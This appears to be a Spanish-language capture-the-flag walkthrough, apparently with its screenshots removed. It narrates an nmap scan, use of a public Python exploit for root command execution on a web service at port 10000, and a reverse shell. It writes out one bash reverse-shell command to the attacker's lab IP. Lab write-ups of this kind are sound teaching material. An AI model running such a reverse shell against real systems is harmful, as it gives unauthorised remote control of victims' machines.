Vamos a hacer un reconocimiento con nmap y nos encuentra el puerto 22 y el puerto 10000:
Vemos que tenemos un servicio web corriendo por el puerto 10.000, que utiliza SSL por lo que tenemos que poner la URL como https:
Si buscamos por internet, podemos ver que existe un exploit en python que nos permite ejecutar comandos si lo lanzamos contra esta web:
Por tanto vamos a probar en descargarlo y vemos las instrucciones:
Lo probamos utilizando los parámetros oportunos y vemos que tenemos ejecución remota de comandos, y además siendo el usuario root:
Es importante recalcar que para esta herramienta los comandos deben ir entre comillas, para que se interpreten correctamente los espacios:
Por tanto vamos a compartir el código para obtener la reverse shell con python y lo pipeamos con bash desde la máquina víctima mientras estamos escuchando con netcat:
bash -i >& /dev/tcp/10.10.16.27/443 0>&1
Subimos esto a un servidor web con python:
Lo ejecutamos en la máquina víctima pipeándolo con bash:
Y recibiremos la shell reversa con netcat:









